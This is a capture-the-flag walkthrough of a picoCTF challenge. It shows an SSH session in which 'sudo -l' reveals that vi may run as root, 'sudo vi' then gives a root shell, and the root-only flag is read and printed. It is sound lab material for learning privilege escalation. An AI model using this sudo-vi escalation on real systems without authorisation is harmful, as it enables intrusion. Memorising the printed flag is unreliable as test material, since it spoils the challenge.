## Objetivo
Can you read files in the root file?

Additional details will be available after launching your challenge instance.


## Solucion
ssh -p 60386 picoplayer@saturn.picoctf.net

The authenticity of host '[saturn.picoctf.net]:60386 ([13.59.203.175]:60386)' can't be established.

ED25519 key fingerprint is SHA256:HKm/Bw1C+mhj23vO8tXULrgLFYvzP6gQH2IwgUiQTok.

This key is not known by any other names

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '[saturn.picoctf.net]:60386' (ED25519) to the list of known hosts.

picoplayer@saturn.picoctf.net's password: 

Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 6.5.0-1023-aws x86_64)

  

 * Documentation:  https://help.ubuntu.com

 * Management:     https://landscape.canonical.com

 * Support:        https://ubuntu.com/advantage

  

This system has been minimized by removing packages and content that are

not required on a system that users do not log into.

  

To restore this content, you can run the 'unminimize' command.

  

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

  

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

  

**picoplayer@challenge**:**~**$ sudo -l

[sudo] password for picoplayer: 

Matching Defaults entries for picoplayer on challenge:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

  

User picoplayer may run the following commands on challenge:

    (ALL) /usr/bin/vi

**picoplayer@challenge**:**~**$ sudo vi test

  

root@challenge:/home/picoplayer# whoami

root

root@challenge:/home/picoplayer# cd /root

root@challenge:~# ls -la

total 12

drwx------ 1 root root   23 Aug  4  2023 **.**

drwxr-xr-x 1 root root   51 Sep 17 17:32 **..**

-rw-r--r-- 1 root root 3106 Dec  5  2019 .bashrc

-rw-r--r-- 1 root root   35 Aug  4  2023 .flag.txt

-rw-r--r-- 1 root root  161 Dec  5  2019 .profile

root@challenge:~# cat ./.flag.txt

picoCTF{uS1ng_v1m_3dit0r_1cee9dcb}

root@challenge:~# Connection to saturn.picoctf.net closed by remote host.

Connection to saturn.picoctf.net closed.
## Notas adicionales

## Referencias